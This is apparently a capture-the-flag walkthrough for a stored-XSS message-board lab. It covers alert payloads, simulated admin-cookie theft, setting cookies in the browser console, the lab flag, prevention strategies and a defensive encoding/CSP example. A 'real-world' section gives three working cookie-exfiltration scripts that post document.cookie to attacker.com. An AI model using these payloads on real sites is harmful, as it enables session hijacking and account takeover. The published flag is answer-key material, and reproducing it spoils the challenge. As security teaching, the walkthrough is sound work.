
  • Daily Challenge
  • Released 04 Aug 2025

XSS Playground - Complete Solution Walkthrough

Understanding This Specific XSS Challenge

This challenge implements a stored XSS vulnerability with a unique twist: when your payload contains document.cookie, the application automatically replaces it with admin cookie values to simulate an admin visiting your malicious message. The key is to steal these replaced admin cookies to gain access to the admin panel.

Step 1: Initial Reconnaissance

  1. Access the application: Navigate to <target-ip> to access the community message board
  2. Explore functionality: Test posting normal messages to understand the interface
  3. Notice admin monitoring: Observe the admin notice indicating the board is monitored
  4. Test for admin endpoints: Try accessing <target-ip>/admin (access denied without privileges)

Step 2: Testing Basic XSS Vulnerability

  1. Basic XSS test: Post a simple alert to confirm the vulnerability
Name: Test
Message: <script>alert('XSS Confirmed')</script>
  2. Verify stored XSS: Refresh the page to confirm the script executes again
  3. Alternative payload formats: If script tags don't work, try:
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

Step 3: Stealing Admin Cookies

Challenge-Specific Approach (Simplified)

  1. Simple cookie theft payload: Since this challenge simulates admin visits, we can use a basic alert
<script>
// The application will replace document.cookie with admin cookies
var stolenCookies = document.cookie;
// Display the stolen admin cookies
alert('Stolen admin cookies: ' + stolenCookies);
</script>
  2. Post the payload: Submit this message through the message board
  3. Extract cookie values: When the page loads, you'll see an alert with the admin cookies
  4. Copy the cookie values: Note down the admin session tokens from the alert

Real-World Cookie Stealing (Educational)

In actual attacks, you cannot see the admin's cookies directly. Instead, you must:

  1. Set up a collection server: Host a server to receive stolen cookies
  2. Plant the payload: Inject XSS that sends cookies to your server
  3. Wait for admin visit: The admin must actually visit the compromised page
  4. Collect the data: Receive stolen cookies on your server

Real-World Cookie Theft Payloads:

// Method 1: Image-based exfiltration
<script>
var cookies = document.cookie;
var img = new Image();
img.src = 'http://attacker.com/steal?data=' + encodeURIComponent(cookies);
</script>

// Method 2: Fetch API exfiltration
<script>
fetch('http://attacker.com/steal', {
method: 'POST',
body: 'cookies=' + encodeURIComponent(document.cookie)
});
</script>

// Method 3: Form submission exfiltration
<script>
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://attacker.com/steal';
var input = document.createElement('input');
input.name = 'stolen_cookies';
input.value = document.cookie;
form.appendChild(input);
document.body.appendChild(form);
form.submit();
</script>

Why Real Attacks Require Patience: Unlike this educational simulation, real XSS attacks require waiting for legitimate admin users to visit the compromised page. The cookies are stolen when the admin's browser executes your malicious script, sending their session data to your collection server.

Step 4: Setting Stolen Cookies and Retrieving Flag

  1. Manual cookie setting: Use browser developer tools to set the stolen cookies
  2. Open Developer Console: Press F12 and go to the Console tab
  3. Set admin cookies: Paste the following command with the stolen cookie values:
// Replace with actual cookie values from Step 3
document.cookie = 'admin_session=true; path=/;';
document.cookie = 'admin_session_token_[64-hex-value]=active; path=/;';
document.cookie = 'sessionid=admin_12345; path=/;';
  4. Access admin panel: Navigate to <target-ip>/admin
  5. Retrieve the flag: The flag is displayed prominently in the admin panel
Flag: a609f3b4-45a7-4089-bea4-e2f115d40dce

Step 5: Understanding the Cookie Theft Mechanism

  1. Server-side replacement: The application searches for 'document.cookie' in messages (case-insensitive)
  2. Automatic substitution: When found, it replaces the text with realistic admin cookie values
  3. Cookie format: Includes multiple admin authentication tokens
  4. Real-world simulation: This demonstrates what happens when an admin visits a compromised page
// Example stolen cookie format:
admin_session=true; admin_session_token_[64-hex]=active; sessionid=admin_12345

Technical Analysis of This Implementation

  • Vulnerability type: Stored Cross-Site Scripting (XSS) with cookie theft
  • Root cause: Direct HTML insertion without sanitization in message rendering
  • Attack method: Cookie theft through XSS payload execution
  • Simulation feature: Automatic document.cookie replacement simulates admin interaction
  • Attack vector: Message posting form with no input validation
  • Educational value: Demonstrates session hijacking through XSS

Security Implications

  • Session hijacking: XSS enables attackers to steal authentication cookies and session tokens
  • Privilege escalation: Stolen admin cookies grant unauthorized access to administrative functions
  • Data theft: Admin access allows retrieval of sensitive information and flags
  • Persistent threat: Stored XSS affects all users who view the compromised content
  • Account takeover: Complete compromise of admin accounts through cookie theft

Prevention Strategies

  • Input sanitization: HTML-encode all user input before storage and display
  • Output encoding: Use proper HTML entity encoding for dynamic content
  • Content Security Policy: Implement strict CSP headers to prevent inline scripts
  • HTTPOnly cookies: Mark session cookies as HTTPOnly to prevent script access
  • Secure cookies: Use Secure flag for cookies in HTTPS environments
  • Input validation: Whitelist allowed HTML tags and attributes
  • Regular testing: Include XSS testing in security assessment procedures
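The following is an added example, not code from the lab: it puts the root cause named in the Technical Analysis (direct HTML insertion of the message) next to the output-encoding, CSP and HttpOnly/Secure cookie controls listed above, and checks that the three payloads used in Step 2 are rendered as inert text. The function names and the HTML template are hypothetical; the lab's own rendering code is not shown on this page.

```javascript
// Hardened message-board rendering (added example; names and template are assumptions).

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Entity-encode the five characters that can break out of an HTML text or attribute context.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering: the stored message is inserted into the page as raw HTML,
// so a <script> or an event-handler attribute in it executes in every viewer's browser.
function renderMessageUnsafe(name, message) {
  return `<div class="msg"><b>${name}</b>: ${message}</div>`;
}

// Hardened rendering: every untrusted value is encoded at output time, so the browser
// shows the payload as text instead of parsing it as markup.
function renderMessageSafe(name, message) {
  return `<div class="msg"><b>${escapeHtml(name)}</b>: ${escapeHtml(message)}</div>`;
}

// Defence in depth: a CSP that refuses inline scripts, and a session cookie that
// document.cookie cannot read (HttpOnly) and that never travels over plain HTTP (Secure).
function securityHeaders(sessionId) {
  return {
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    'Set-Cookie': `sessionid=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`,
  };
}

// Constructed test inputs: the payloads from Step 2 of the walkthrough.
const PAYLOADS = [
  "<script>alert('XSS Confirmed')</script>",
  "<img src=x onerror=alert('XSS')>",
  "<svg onload=alert('XSS')>",
];

// True when no payload survives encoding with a character that could still form markup.
function allPayloadsNeutralised() {
  return PAYLOADS.every((p) => !/[<>"']/.test(escapeHtml(p)));
}

// True when the unsafe renderer still emits the payload's tag verbatim (the lab's bug).
function unsafeRendererKeepsMarkup() {
  return PAYLOADS.every((p) => renderMessageUnsafe('Test', p).includes(p));
}
```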